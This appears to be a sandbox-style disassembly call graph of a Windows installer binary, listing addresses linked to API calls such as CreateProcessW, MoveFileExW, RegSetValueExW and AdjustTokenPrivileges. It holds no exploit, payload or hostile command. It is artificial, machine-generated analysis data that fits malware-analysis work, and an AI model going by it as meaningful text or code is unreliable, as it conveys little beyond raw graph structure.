4069->4071 4070 405371 26 API calls 4070->4057 4073 405bb5 4071->4073 4072->4057 4072->4068 4072->4070 4136 4059bb 4072->4136 4144 405371 4072->4144 4155 4060b3 MoveFileExW 4072->4155 4073->4042 4090 406241 4076->4090 4077 402c80 4077->4035 4095 4064a6 4077->4095 4078 40648c 4078->4077 4111 406212 lstrcpynW 4078->4111 4080 4062f4 GetVersion 4080->4090 4081 40645a lstrlenW 4081->4090 4084 406234 10 API calls 4084->4081 4085 40636f GetSystemDirectoryW 4085->4090 4087 406382 GetWindowsDirectoryW 4087->4090 4088 4064a6 5 API calls 4088->4090 4089 4063b6 SHGetSpecialFolderLocation 4089->4090 4094 4063ce SHGetPathFromIDListW CoTaskMemFree 4089->4094 4090->4078 4090->4080 4090->4081 4090->4084 4090->4085 4090->4087 4090->4088 4090->4089 4091 4063fb lstrcatW 4090->4091 4092 406234 10 API calls 4090->4092 4093 4063a3 SHGetFolderPathW 4090->4093 4104 4060df RegOpenKeyExW 4090->4104 4109 406159 wsprintfW 4090->4109 4110 406212 lstrcpynW 4090->4110 4091->4090 4092->4090 4093->4089 4093->4090 4094->4090 4102 4064b3 4095->4102 4096 406529 4097 40652e CharPrevW 4096->4097 4099 40654f 4096->4099 4097->4096 4098 40651c CharNextW 4098->4096 4098->4102 4099->4035 4101 406508 CharNextW 4101->4102 4102->4096 4102->4098 4102->4101 4103 406517 CharNextW 4102->4103 4112 405bf3 4102->4112 4103->4098 4105 406153 4104->4105 4106 406113 RegQueryValueExW 4104->4106 4105->4090 4107 406134 RegCloseKey 4106->4107 4107->4105 4109->4090 4110->4090 4111->4077 4113 405bf9 4112->4113 4114 405c0f 4113->4114 4115 405c00 CharNextW 4113->4115 4114->4102 4115->4113 4165 406212 lstrcpynW 4116->4165 4118 405cdf 4166 405c71 CharNextW CharNextW 4118->4166 4121 405a23 4121->4040 4121->4041 4122 4064a6 5 API calls 4127 405cf5 4122->4127 4123 405d26 lstrlenW 4124 405d31 4123->4124 4123->4127 4126 405bc6 3 API calls 4124->4126 4125 406555 2 API calls 4125->4127 4128 405d36 GetFileAttributesW 4126->4128 4127->4121 4127->4123 4127->4125 4129 405c12 2 API calls 4127->4129 4128->4121 4129->4123 4130->4044 4132 405c20 4131->4132 4133 405c32 4132->4133 4134 405c26 CharPrevW 4132->4134 4133->4048 4134->4132 4134->4133 4135->4061 4172 405dc2 GetFileAttributesW 4136->4172 4139 4059e8 4139->4072 4140 4059d6 RemoveDirectoryW 4142 4059e4 4140->4142 4141 4059de DeleteFileW 4141->4142 4142->4139 4143 4059f4 SetFileAttributesW 4142->4143 4143->4139 4145 40538c 4144->4145 4154 40542e 4144->4154 4146 4053a8 lstrlenW 4145->4146 4147 406234 19 API calls 4145->4147 4148 4053d1 4146->4148 4149 4053b6 lstrlenW 4146->4149 4147->4146 4151 4053e4 4148->4151 4152 4053d7 SetWindowTextW 4148->4152 4150 4053c8 lstrcatW 4149->4150 4149->4154 4150->4148 4153 4053ea SendMessageW SendMessageW SendMessageW 4151->4153 4151->4154 4152->4151 4153->4154 4154->4072 4156 4060d4 4155->4156 4157 4060c7 4155->4157 4156->4072 4175 405f41 lstrcpyW 4157->4175 4160 405b87 4159->4160 4161 40656b FindClose 4159->4161 4160->4042 4160->4053 4161->4160 4163 405be2 lstrcatW 4162->4163 4164 405b91 4162->4164 4163->4164 4164->4058 4165->4118 4167 405c8e 4166->4167 4170 405ca0 4166->4170 4169 405c9b CharNextW 4167->4169 4167->4170 4168 405cc4 4168->4121 4168->4122 4169->4168 4170->4168 4171 405bf3 CharNextW 4170->4171 4171->4170 4173 4059c7 4172->4173 4174 405dd4 SetFileAttributesW 4172->4174 4173->4139 4173->4140 4173->4141 4174->4173 4176 405f69 4175->4176 4177 405f8f GetShortPathNameW 4175->4177 4202 405de7 GetFileAttributesW CreateFileW 4176->4202 4179 405fa4 4177->4179 4180 4060ae 4177->4180 4179->4180 4182 405fac wsprintfA 4179->4182 4180->4156 4181 405f73 CloseHandle GetShortPathNameW 4181->4180 4183 405f87 4181->4183 4184 406234 19 API calls 4182->4184 4183->4177 4183->4180 4185 405fd4 4184->4185 4203 405de7 GetFileAttributesW CreateFileW 4185->4203 4187 405fe1 4187->4180 4188 405ff0 GetFileSize GlobalAlloc 4187->4188 4189 406012 4188->4189 4190 4060a7 CloseHandle 4188->4190 4204 405e6a ReadFile 4189->4204 4190->4180 4195 406031 lstrcpyA 4198 406053 4195->4198 4196 406045 4197 405d4c 4 API calls 4196->4197 4197->4198 4199 40608a SetFilePointer 4198->4199 4211 405e99 WriteFile 4199->4211 4202->4181 4203->4187 4205 405e88 4204->4205 4205->4190 4206 405d4c lstrlenA 4205->4206 4207 405d8d lstrlenA 4206->4207 4208 405d95 4207->4208 4209 405d66 lstrcmpiA 4207->4209 4208->4195 4208->4196 4209->4208 4210 405d84 CharNextA 4209->4210 4210->4207 4212 405eb7 GlobalFree 4211->4212 4212->4190 4213 4015c1 4214 402c53 19 API calls 4213->4214 4215 4015c8 4214->4215 4216 405c71 4 API calls 4215->4216 4228 4015d1 4216->4228 4217 401631 4219 401663 4217->4219 4220 401636 4217->4220 4218 405bf3 CharNextW 4218->4228 4223 401423 26 API calls 4219->4223 4240 401423 4220->4240 4229 40165b 4223->4229 4227 40164a SetCurrentDirectoryW 4227->4229 4228->4217 4228->4218 4230 401617 GetFileAttributesW 4228->4230 4232 4058da 4228->4232 4235 405840 CreateDirectoryW 4228->4235 4244 4058bd CreateDirectoryW 4228->4244 4230->4228 4247 4065ec GetModuleHandleA 4232->4247 4236 405891 GetLastError 4235->4236 4237 40588d 4235->4237 4236->4237 4238 4058a0 SetFileSecurityW 4236->4238 4237->4228 4238->4237 4239 4058b6 GetLastError 4238->4239 4239->4237 4241 405371 26 API calls 4240->4241 4242 401431 4241->4242 4243 406212 lstrcpynW 4242->4243 4243->4227 4245 4058d1 GetLastError 4244->4245 4246 4058cd 4244->4246 4245->4246 4246->4228 4248 406612 GetProcAddress 4247->4248 4249 406608 4247->4249 4251 4058e1 4248->4251 4253 40657c GetSystemDirectoryW 4249->4253 4251->4228 4252 40660e 4252->4248 4252->4251 4254 40659e wsprintfW LoadLibraryExW 4253->4254 4254->4252 4256 401e43 4264 402c31 4256->4264 4258 401e49 4259 402c31 19 API calls 4258->4259 4260 401e55 4259->4260 4261 401e61 ShowWindow 4260->4261 4262 401e6c EnableWindow 4260->4262 4263 402adb 4261->4263 4262->4263 4265 406234 19 API calls 4264->4265 4266 402c46 4265->4266 4266->4258 5242 4028c3 5243 402c53 19 API calls 5242->5243 5244 4028d1 5243->5244 5245 4028e7 5244->5245 5246 402c53 19 API calls 5244->5246 5247 405dc2 2 API calls 5245->5247 5246->5245 5248 4028ed 5247->5248 5270 405de7 GetFileAttributesW CreateFileW 5248->5270 5250 4028fa 5251 402906 GlobalAlloc 5250->5251 5252 40299d 5250->5252 5253 402994 CloseHandle 5251->5253 5254 40291f 5251->5254 5255 4029a5 DeleteFileW 5252->5255 5256 4029b8 5252->5256 5253->5252 5271 403402 SetFilePointer 5254->5271 5255->5256 5258 402925 5259 4033ec ReadFile 5258->5259 5260 40292e GlobalAlloc 5259->5260 5261 402972 5260->5261 5262 40293e 5260->5262 5264 405e99 WriteFile 5261->5264 5263 40317b 46 API calls 5262->5263 5269 40294b 5263->5269 5265 40297e GlobalFree 5264->5265 5266 40317b 46 API calls 5265->5266 5268 402991 5266->5268 5267 402969 GlobalFree 5267->5261 5268->5253 5269->5267 5270->5250 5271->5258 5272 404ac7 5273 404af3 5272->5273 5274 404ad7 5272->5274 5276 404b26 5273->5276 5277 404af9 SHGetPathFromIDListW 5273->5277 5283 40593b GetDlgItemTextW 5274->5283 5279 404b10 SendMessageW 5277->5279 5280 404b09 5277->5280 5278 404ae4 SendMessageW 5278->5273 5279->5276 5281 40140b 2 API calls 5280->5281 5281->5279 5283->5278 4279 40344a SetErrorMode GetVersion 4280 403485 4279->4280 4281 40347f 4279->4281 4283 40657c 3 API calls 4280->4283 4282 4065ec 5 API calls 4281->4282 4282->4280 4284 40349b lstrlenA 4283->4284 4284->4280 4285 4034ab 4284->4285 4286 4065ec 5 API calls 4285->4286 4287 4034b3 4286->4287 4288 4065ec 5 API calls 4287->4288 4289 4034ba #17 OleInitialize SHGetFileInfoW 4288->4289 4367 406212 lstrcpynW 4289->4367 4291 4034f7 GetCommandLineW 4368 406212 lstrcpynW 4291->4368 4293 403509 GetModuleHandleW 4294 403521 4293->4294 4295 405bf3 CharNextW 4294->4295 4296 403530 CharNextW 4295->4296 4297 40365a GetTempPathW 4296->4297 4305 403549 4296->4305 4369 403419 4297->4369 4299 403672 4300 403676 GetWindowsDirectoryW lstrcatW 4299->4300 4301 4036cc DeleteFileW 4299->4301 4302 403419 12 API calls 4300->4302 4379 402ed5 GetTickCount GetModuleFileNameW 4301->4379 4306 403692 4302->4306 4303 405bf3 CharNextW 4303->4305 4305->4303 4310 403645 4305->4310 4312 403643 4305->4312 4306->4301 4308 403696 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4306->4308 4307 4036e0 4316 405bf3 CharNextW 4307->4316 4350 403783 4307->4350 4362 403793 4307->4362 4311 403419 12 API calls 4308->4311 4465 406212 lstrcpynW 4310->4465 4314 4036c4 4311->4314 4312->4297 4314->4301 4314->4362 4329 4036ff 4316->4329 4318 4038cd 4321 403951 ExitProcess 4318->4321 4322 4038d5 GetCurrentProcess OpenProcessToken 4318->4322 4319 4037ad 4477 405957 4319->4477 4327 403921 4322->4327 4328 4038ed LookupPrivilegeValueW AdjustTokenPrivileges 4322->4328 4324 4037c3 4331 4058da 5 API calls 4324->4331 4325 40375d 4330 405cce 18 API calls 4325->4330 4332 4065ec 5 API calls 4327->4332 4328->4327 4329->4324 4329->4325 4333 403769 4330->4333 4334 4037c8 lstrcatW 4331->4334 4337 403928 4332->4337 4333->4362 4466 406212 lstrcpynW 4333->4466 4335 4037e4 lstrcatW lstrcmpiW 4334->4335 4336 4037d9 lstrcatW 4334->4336 4341 403800 4335->4341 4335->4362 4336->4335 4338 40393d ExitWindowsEx 4337->4338 4339 40394a 4337->4339 4338->4321 4338->4339 4486 40140b 4339->4486 4344 403805 4341->4344 4345 40380c 4341->4345 4343 403778 4467 406212 lstrcpynW 4343->4467 4348 405840 4 API calls 4344->4348 4346 4058bd 2 API calls 4345->4346 4349 403811 SetCurrentDirectoryW 4346->4349 4351 40380a 4348->4351 4352 403821 4349->4352 4353 40382c 4349->4353 4409 403a5b 4350->4409 4351->4349 4481 406212 lstrcpynW 4352->4481 4482 406212 lstrcpynW 4353->4482 4356 406234 19 API calls 4357 40386b DeleteFileW 4356->4357 4358 403878 CopyFileW 4357->4358 4364 40383a 4357->4364 4358->4364 4359 4038c1 4360 4060b3 39 API calls 4359->4360 4360->4362 4361 4060b3 39 API calls 4361->4364 4468 403969 4362->4468 4363 406234 19 API calls 4363->4364 4364->4356 4364->4359 4364->4361 4364->4363 4366 4038ac CloseHandle 4364->4366 4483 4058f2 CreateProcessW 4364->4483 4366->4364 4367->4291 4368->4293 4370 4064a6 5 API calls 4369->4370 4371 403425 4370->4371 4372 40342f 4371->4372 4373 405bc6 3 API calls 4371->4373 4372->4299 4374 403437 4373->4374 4375 4058bd 2 API calls 4374->4375 4376 40343d 4375->4376 4489 405e16 4376->4489 4493 405de7 GetFileAttributesW CreateFileW 4379->4493 4381 402f18 4408 402f25 4381->4408 4494 406212 lstrcpynW 4381->4494 4383 402f3b 4384 405c12 2 API calls 4383->4384 4385 402f41 4384->4385 4495 406212 lstrcpynW 4385->4495 4387 402f4c GetFileSize 4388 40304d 4387->4388 4406 402f63 4387->4406 4496 402e33 4388->4496 4392 403090 GlobalAlloc 4396 4030a7 4392->4396 4393 4030e8 4394 402e33 34 API calls 4393->4394 4394->4408 4398 405e16 2 API calls 4396->4398 4397 403071 4399 4033ec ReadFile 4397->4399 4401 4030b8 CreateFileW 4398->4401 4402 40307c 4399->4402 4400 402e33 34 API calls 4400->4406 4403 4030f2 4401->4403 4401->4408 4402->4392 4402->4408 4511 403402 SetFilePointer 4403->4511 4405 403100 4512 40317b 4405->4512 4406->4388 4406->4393 4406->4400 4406->4408 4527 4033ec 4406->4527 4408->4307 4410 4065ec 5 API calls 4409->4410 4411 403a6f 4410->4411 4412 403a75 4411->4412 4413 403a87 4411->4413 4568 406159 wsprintfW 4412->4568 4414 4060df 3 API calls 4413->4414 4415 403ab7 4414->4415 4417 403ad6 lstrcatW 4415->4417 4419 4060df 3 API calls 4415->4419 4418 403a85 4417->4418 4559 403d31 4418->4559 4419->4417 4422 405cce 18 API calls 4423 403b08 4422->4423 4424 403b9c 4423->4424 4426 4060df 3 API calls 4423->4426 4425 405cce 18 API calls 4424->4425 4429 403ba2 4425->4429 4427 403b3a 4426->4427 4427->4424 4434 403b5b lstrlenW 4427->4434 4437 405bf3 CharNextW 4427->4437 4428 403bb2 LoadImageW 4431 403c58 4428->4431 4432 403bd9 RegisterClassW 4428->4432 4429->4428 4430 406234 19 API calls 4429->4430 4430->4428 4433 40140b 2 API calls 4431->4433 4435 403c0f SystemParametersInfoW CreateWindowExW 4432->4435 4464 403c62 4432->4464 4436 403c5e 4433->4436 4438 403b69 lstrcmpiW 4434->4438 4439 403b8f 4434->4439 4435->4431 4444 403d31 20 API calls 4436->4444 4436->4464 4441 403b58 4437->4441 4438->4439 4442 403b79 GetFileAttributesW 4438->4442 4440 405bc6 3 API calls 4439->4440 4445 403b95 4440->4445 4441->4434 4443 403b85 4442->4443 4443->4439 4446 405c12 2 API calls 4443->4446 4447 403c6f 4444->4447 4569 406212 lstrcpynW 4445->4569 4446->4439 4449 403c7b ShowWindow 4447->4449 4450 403cfe 4447->4450 4452 40657c 3 API calls 4449->4452 4570 405444 OleInitialize 4450->4570 4454 403c93 4452->4454 4453 403d04 4455 403d20 4453->4455 4456 403d08 4453->4456 4457 403ca1 GetClassInfoW 4454->4457 4459 40657c 3 API calls 4454->4459 4458 40140b 2 API calls 4455->4458 4462 40140b 2 API calls 4456->4462 4456->4464 4460 403cb5 GetClassInfoW RegisterClassW 4457->4460 4461 403ccb DialogBoxParamW 4457->4461 4458->4464 4459->4457 4460->4461 4463 40140b 2 API calls 4461->4463 4462->4464 4463->4464 4464->4362 4465->4312 4466->4343 4467->4350 4469 403984 4468->4469 4470 40397a CloseHandle 4468->4470 4471 403998 4469->4471 4472 40398e CloseHandle 4469->4472 4470->4469 4585 4039c6 4471->4585 4472->4471 4475 405a03 70 API calls 4476 40379c OleUninitialize 4475->4476 4476->4318 4476->4319 4478 40596c 4477->4478 4479 4037bb ExitProcess 4478->4479 4480 405980 MessageBoxIndirectW 4478->4480 4480->4479 4481->4353 4482->4364 4484 405931 4483->4484 4485 405925 CloseHandle 4483->4485 4484->4364 4485->4484 4487 401389 2 API calls 4486->4487 4488 401420 4487->4488 4488->4321 4490 405e23 GetTickCount GetTempFileNameW 4489->4490 4491 403448 4490->4491 4492 405e59 4490->4492 4491->4299 4492->4490 4492->4491 4493->4381 4494->4383 4495->4387 4497 402e44 4496->4497 4498 402e5c 4496->4498 4499 402e4d DestroyWindow 4497->4499 4505 402e54 4497->4505 4500 402e64 4498->4500 4501 402e6c GetTickCount 4498->4501 4499->4505 4531 406628 4500->4531 4502 402e7a 4501->4502 4501->4505 4504 402eaf CreateDialogParamW ShowWindow 4502->4504 4506 402e82 4502->4506 4504->4505 4505->4392 4505->4408 4530 403402 SetFilePointer 4505->4530 4506->4505 4535 402e17 4506->4535 4508 402e90 wsprintfW 4509 405371 26 API calls 4508->4509 4510 402ead 4509->4510 4510->4505 4511->4405 4513 4031a6 4512->4513 4514 40318a SetFilePointer 4512->4514 4538 403283 GetTickCount 4513->4538 4514->4513 4517 403243 4517->4408 4518 405e6a ReadFile 4519 4031c6 4518->4519 4519->4517 4520 403283 44 API calls 4519->4520 4521 4031dd 4520->4521 4521->4517 4522 403249 ReadFile 4521->4522 4524 4031ec 4521->4524 4522->4517 4524->4517 4525 405e6a ReadFile 4524->4525 4526 405e99 WriteFile 4524->4526 4525->4524 4526->4524 4528 405e6a ReadFile 4527->4528 4529 4033ff 4528->4529 4529->4406 4530->4397 4532 406645 PeekMessageW 4531->4532 4533 406655 4532->4533 4534 40663b DispatchMessageW 4532->4534 4533->4505 4534->4532 4536 402e26 4535->4536 4537 402e28 MulDiv 4535->4537 4536->4537 4537->4508 4539 4032b1 4538->4539 4540 4033db 4538->4540 4551 403402 SetFilePointer 4539->4551 4541 402e33 34 API calls 4540->4541 4543 4031ad 4541->4543 4543->4517 4543->4518 4544 4032bc SetFilePointer 4546 4032e1 4544->4546 4545 4033ec ReadFile 4545->4546 4546->4543 4546->4545 4548 402e33 34 API calls 4546->4548 4549 405e99 WriteFile 4546->4549 4550 4033bc SetFilePointer 4546->4550 4552 40672b 4546->4552 4548->4546 4549->4546 4550->4540 4551->4544 4553 406750 4552->4553 4556 406758 4552->4556 4553->4546 4554 4067e8 GlobalAlloc 4554->4553 4554->4556 4555 4067df GlobalFree 4555->4554 4556->4553 4556->4554 4556->4555 4557 406856 GlobalFree 4556->4557 4558 40685f GlobalAlloc 4556->4558 4557->4558 4558->4553 4558->4556 4560 403d45 4559->4560 4577 406159 wsprintfW 4560->4577 4562 403db6 4563 406234 19 API calls 4562->4563 4564 403dc2 SetWindowTextW 4563->4564 4565 403ae6 4564->4565 4566 403dde 4564->4566 4565->4422 4566->4565 4567 406234 19 API calls 4566->4567 4567->4566 4568->4418 4569->4424 4578 404322 4570->4578 4572 404322 SendMessageW 4574 4054a0 OleUninitialize 4572->4574 4573 405467 4576 40548e 4573->4576 4581 401389 4573->4581 4574->4453 4576->4572 4577->4562 4579 40433a 4578->4579 4580 40432b SendMessageW 4578->4580 4579->4573 4580->4579 4583 401390 4581->4583 4582 4013fe 4582->4573 4583->4582 4584 4013cb MulDiv SendMessageW 4583->4584 4584->4583 4586 4039d4 4585->4586 4587 40399d 4586->4587 4588 4039d9 FreeLibrary GlobalFree 4586->4588 4587->4475 4588->4587 4588->4588 5284 402a4b 5285 402c31 19 API calls 5284->5285 5286 402a51 5285->5286 5287 402a88 5286->5287 5288 4028a1 5286->5288 5290 402a63 5286->5290 5287->5288 5289 406234 19 API calls 5287->5289 5289->5288 5290->5288 5292 406159 wsprintfW 5290->5292 5292->5288 5296 4016cc 5297 402c53 19 API calls 5296->5297 5298 4016d2 GetFullPathNameW 5297->5298 5299 40170e 5298->5299 5300 4016ec 5298->5300 5301 401723 GetShortPathNameW 5299->5301 5302 402adb 5299->5302 5300->5299 5303 406555 2 API calls 5300->5303 5301->5302 5304 4016fe 5303->5304 5304->5299 5306 406212 lstrcpynW 5304->5306 5306->5299 5307 401b4d 5308 402c53 19 API calls 5307->5308 5309 401b54 5308->5309 5310 402c31 19 API calls 5309->5310 5311 401b5d wsprintfW 5310->5311 5312 402adb 5311->5312 4599 40234e 4600 402c53 19 API calls 4599->4600 4601 40235d 4600->4601 4602 402c53 19 API calls 4601->4602 4603 402366 4602->4603 4604 402c53 19 API calls 4603->4604 4605 402370 GetPrivateProfileStringW 4604->4605 5320 402851 5321 402859 5320->5321 5322 40285d FindNextFileW 5321->5322 5324 40286f 5321->5324 5323 4028b6 5322->5323 5322->5324 5326 406212 lstrcpynW 5323->5326 5326->5324 4643 401ed5 4644 402c53 19 API calls 4643->4644 4645 401edb 4644->4645 4646 405371 26 API calls 4645->4646 4647 401ee5 4646->4647 4648 4058f2 2 API calls 4647->4648 4649 401eeb 4648->4649 4650 401f4a CloseHandle 4649->4650 4651 401efb WaitForSingleObject 4649->4651 4653 4028a1 4649->4653 4650->4653 4652 401f0d 4651->4652 4654 401f1f GetExitCodeProcess 4652->4654 4657 406628 2 API calls 4652->4657 4655 401f31 4654->4655 4656 401f3e 4654->4656 4661 406159 wsprintfW 4655->4661 4656->4650 4660 401f3c 4656->4660 4658 401f14 WaitForSingleObject 4657->4658 4658->4652 4660->4650 4661->4660 5327 401956 5328 402c53 19 API calls 5327->5328 5329 40195d lstrlenW 5328->5329 5330 4025a8 5329->5330 5331 4014d7 5332 402c31 19 API calls 5331->5332 5333 4014dd Sleep 5332->5333 5335 402adb 5333->5335 5336 401f58 5337 402c53 19 API calls 5336->5337 5338 401f5f 5337->5338 5339 406555 2 API calls 5338->5339 5340 401f65 5339->5340 5342 401f76 5340->5342 5343 406159 wsprintfW 5340->5343 5343->5342 5344 402259 5345 402c53 19 API calls 5344->5345 5346 40225f 5345->5346 5347 402c53 19 API calls 5346->5347 5348 402268 5347->5348 5349 402c53 19 API calls 5348->5349 5350 402271 5349->5350 5351 406555 2 API calls 5350->5351 5352 40227a 5351->5352 5353 40228b lstrlenW lstrlenW 5352->5353 5357 40227e 5352->5357 5355 405371 26 API calls 5353->5355 5354 405371 26 API calls 5358 402286 5354->5358 5356 4022c9 SHFileOperationW 5355->5356 5356->5357 5356->5358 5357->5354 5357->5358 5359 4068da 5361 40675e 5359->5361 5360 4070c9 5361->5360 5362 4067e8 GlobalAlloc 5361->5362 5363 4067df GlobalFree 5361->5363 5364 406856 GlobalFree 5361->5364 5365 40685f GlobalAlloc 5361->5365 5362->5360 5362->5361 5363->5362 5364->5365 5365->5360 5365->5361 4684 40175c 4685 402c53 19 API calls 4684->4685 4686 401763 4685->4686 4687 405e16 2 API calls 4686->4687 4688 40176a 4687->4688 4689 405e16 2 API calls 4688->4689 4689->4688 5366 4022dd 5367 4022e4 5366->5367 5371 4022f7 5366->5371 5368 406234 19 API calls 5367->5368 5369 4022f1 5368->5369 5370 405957 MessageBoxIndirectW 5369->5370 5370->5371 4702 402660 4703 402c31 19 API calls 4702->4703 4712 40266f 4703->4712 4704 4027ac 4705 4026b9 ReadFile 4705->4704 4705->4712 4706 402752 4706->4704 4706->4712 4716 405ec8 SetFilePointer 4706->4716 4707 405e6a ReadFile 4707->4712 4709 4026f9 MultiByteToWideChar 4709->4712 4710 4027ae 4725 406159 wsprintfW 4710->4725 4712->4704 4712->4705 4712->4706 4712->4707 4712->4709 4712->4710 4713 40271f SetFilePointer MultiByteToWideChar 4712->4713 4714 4027bf 4712->4714 4713->4712 4714->4704 4715 4027e0 SetFilePointer 4714->4715 4715->4704 4717 405ee4 4716->4717 4722 405f00 4716->4722 4718 405e6a ReadFile 4717->4718 4719 405ef0 4718->4719 4720 405f31 SetFilePointer 4719->4720 4721 405f09 SetFilePointer 4719->4721 4719->4722 4720->4722 4721->4720 4723 405f14 4721->4723 4722->4706 4724 405e99 WriteFile 4723->4724 4724->4722 4725->4704 5372 401563 5373 402a81 5372->5373 5376 406159 wsprintfW 5373->5376 5375 402a86 5376->5375 4730 4052e5 4731 4052f5 4730->4731 4732 405309 4730->4732 4734 405352 4731->4734 4735 4052fb 4731->4735 4733 405311 IsWindowVisible 4732->4733 4742 405331 4732->4742 4733->4734 4736 40531e 4733->4736 4737 405357 CallWindowProcW 4734->4737 4738 404322 SendMessageW 4735->4738 4744 404c3b SendMessageW 4736->4744 4740 405305 4737->4740 4738->4740 4742->4737 4749 404cbb 4742->4749 4745 404c9a SendMessageW 4744->4745 4746 404c5e GetMessagePos ScreenToClient SendMessageW 4744->4746 4747 404c92 4745->4747 4746->4747 4748 404c97 4746->4748 4747->4742 4748->4745 4758 406212 lstrcpynW 4749->4758 4751 404cce 4759 406159 wsprintfW 4751->4759 4753 404cd8 4754 40140b 2 API calls 4753->4754 4755 404ce1 4754->4755 4760 406212 lstrcpynW 4755->4760 4757 404ce8 4757->4734 4758->4751 4759->4753 4760->4757 5384 401968 5385 402c31 19 API calls 5384->5385 5386 40196f 5385->5386 5387 402c31 19 API calls 5386->5387 5388 40197c 5387->5388 5389 402c53 19 API calls 5388->5389 5390 401993 lstrlenW 5389->5390 5391 4019a4 5390->5391 5392 4019e5 5391->5392 5396 406212 lstrcpynW 5391->5396 5394 4019d5 5394->5392 5395 4019da lstrlenW 5394->5395 5395->5392 5396->5394 5397 100018a9 5398 100018cc 5397->5398 5399 100018ff GlobalFree 5398->5399 5400 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5398->5400 5399->5400 5401 10001272 2 API calls 5400->5401 5402 10001a87 GlobalFree GlobalFree 5401->5402 4761 4023ea 4762 4023f0 4761->4762 4763 402c53 19 API calls 4762->4763 4764 402402 4763->4764 4765 402c53 19 API calls 4764->4765 4766 40240c RegCreateKeyExW 4765->4766 4767 402436 4766->4767 4768 4028a1 4766->4768 4769 402c53 19 API calls 4767->4769 4770 402451 4767->4770 4773 402447 lstrlenW 4769->4773 4771 40245d 4770->4771 4774 402c31 19 API calls 4770->4774 4772 40247c RegSetValueExW 4771->4772 4775 40317b 46 API calls 4771->4775 4776 402492 RegCloseKey 4772->4776 4773->4770 4774->4771 4775->4772 4776->4768 5403 40166a 5404 402c53 19 API calls 5403->5404 5405 401670 5404->5405 5406 406555 2 API calls 5405->5406 5407 401676 5406->5407 5408 4043ea lstrcpynW lstrlenW 4778 404ced GetDlgItem GetDlgItem 4779 404d3f 7 API calls 4778->4779 4782 404f58 4778->4782 4780 404de2 DeleteObject 4779->4780 4781 404dd5 SendMessageW 4779->4781 4783 404deb 4780->4783 4781->4780 4789 40501d 4782->4789 4795 404fb8 4782->4795 4806 40503c 4782->4806 4784 404dfa 4783->4784 4785 404e22 4783->4785 4788 406234 19 API calls 4784->4788 4834 4042d6 4785->4834 4787 4050e8 4792 4050f2 SendMessageW 4787->4792 4793 4050fa 4787->4793 4794 404e04 SendMessageW SendMessageW 4788->4794 4800 40502e SendMessageW 4789->4800 4789->4806 4790 404e36 4797 4042d6 20 API calls 4790->4797 4791 4052d0 4842 40433d 4791->4842 4792->4793 4801 405113 4793->4801 4802 40510c ImageList_Destroy 4793->4802 4810 405123 4793->4810 4794->4783 4796 404c3b 5 API calls 4795->4796 4813 404fc9 4796->4813 4814 404e44 4797->4814 4798 405095 SendMessageW 4798->4791 4804 4050aa SendMessageW 4798->4804 4800->4806 4807 40511c GlobalFree 4801->4807 4801->4810 4802->4801 4803 405292 4803->4791 4811 4052a4 ShowWindow GetDlgItem ShowWindow 4803->4811 4809 4050bd 4804->4809 4806->4787 4806->4791 4806->4798 4807->4810 4808 404f19 GetWindowLongW SetWindowLongW 4812 404f32 4808->4812 4820 4050ce SendMessageW 4809->4820 4810->4803 4825 404cbb 4 API calls 4810->4825 4829 40515e 4810->4829 4811->4791 4815 404f50 4812->4815 4816 404f38 ShowWindow 4812->4816 4813->4789 4814->4808 4819 404e94 SendMessageW 4814->4819 4821 404f13 4814->4821 4823 404ed0 SendMessageW 4814->4823 4824 404ee1 SendMessageW 4814->4824 4838 40430b SendMessageW 4815->4838 4837 40430b SendMessageW 4816->4837 4819->4814 4820->4787 4821->4808 4821->4812 4822 404f4b 4822->4791 4823->4814 4824->4814 4825->4829 4826 405268 InvalidateRect 4826->4803 4827 40527e 4826->4827 4839 404bf6 4827->4839 4828 40518c SendMessageW 4830 4051a2 4828->4830 4829->4828 4829->4830 4830->4826 4831 405203 4830->4831 4833 405216 SendMessageW SendMessageW 4830->4833 4831->4833 4833->4830 4835 406234 19 API calls 4834->4835 4836 4042e1 SetDlgItemTextW 4835->4836 4836->4790 4837->4822 4838->4782 4856 404b2d 4839->4856 4841 404c0b 4841->4803 4843 404355 GetWindowLongW 4842->4843 4844 4043de 4842->4844 4843->4844 4845 404366 4843->4845 4846 404375 GetSysColor 4845->4846 4847 404378 4845->4847 4846->4847 4848 404388 SetBkMode 4847->4848 4849 40437e SetTextColor 4847->4849 4850 4043a0 GetSysColor 4848->4850 4851 4043a6 4848->4851 4849->4848 4850->4851 4852 4043b7 4851->4852 4853 4043ad SetBkColor 4851->4853 4852->4844 4854 4043d1 CreateBrushIndirect 4852->4854 4855 4043ca DeleteObject 4852->4855 4853->4852 4854->4844 4855->4854 4857 404b46 4856->4857 4858 406234 19 API calls 4857->4858 4859 404baa 4858->4859 4860 406234 19 API calls 4859->4860 4861 404bb5 4860->4861 4862 406234 19 API calls 4861->4862 4863 404bcb lstrlenW wsprintfW SetDlgItemTextW 4862->4863 4863->4841 5409 401ced 5410 402c31 19 API calls 5409->5410 5411 401cf3 IsWindow 5410->5411 5412 401a20 5411->5412 4864 40176f 4865 402c53 19 API calls 4864->4865 4866 401776 4865->4866 4867 401796 4866->4867 4868 40179e 4866->4868 4903 406212 lstrcpynW 4867->4903 4904 406212 lstrcpynW 4868->4904 4871 4017a9 4873 405bc6 3 API calls 4871->4873 4872 40179c 4875 4064a6 5 API calls 4872->4875 4874 4017af lstrcatW 4873->4874 4874->4872 4892 4017bb 4875->4892 4876 406555 2 API calls 4876->4892 4877 405dc2 2 API calls 4877->4892 4879 4017cd CompareFileTime 4879->4892 4880 40188d 4882 405371 26 API calls 4880->4882 4881 401864 4883 405371 26 API calls 4881->4883 4891 401879 4881->4891 4885 401897 4882->4885 4883->4891 4884 406212 lstrcpynW 4884->4892 4886 40317b 46 API calls 4885->4886 4887 4018aa 4886->4887 4888 4018be SetFileTime 4887->4888 4890 4018d0 CloseHandle 4887->4890 4888->4890 4889 406234 19 API calls 4889->4892 4890->4891 4893 4018e1 4890->4893 4892->4876 4892->4877 4892->4879 4892->4880 4892->4881 4892->4884 4892->4889 4900 405957 MessageBoxIndirectW 4892->4900 4902 405de7 GetFileAttributesW CreateFileW 4892->4902 4894 4018e6 4893->4894 4895 4018f9 4893->4895 4897 406234 19 API calls 4894->4897 4896 406234 19 API calls 4895->4896 4899 401901 4896->4899 4898 4018ee lstrcatW 4897->4898 4898->4899 4901 405957 MessageBoxIndirectW 4899->4901 4900->4892 4901->4891 4902->4892 4903->4872 4904->4871 4905 401b71 4906 401bc2 4905->4906 4907 401b7e 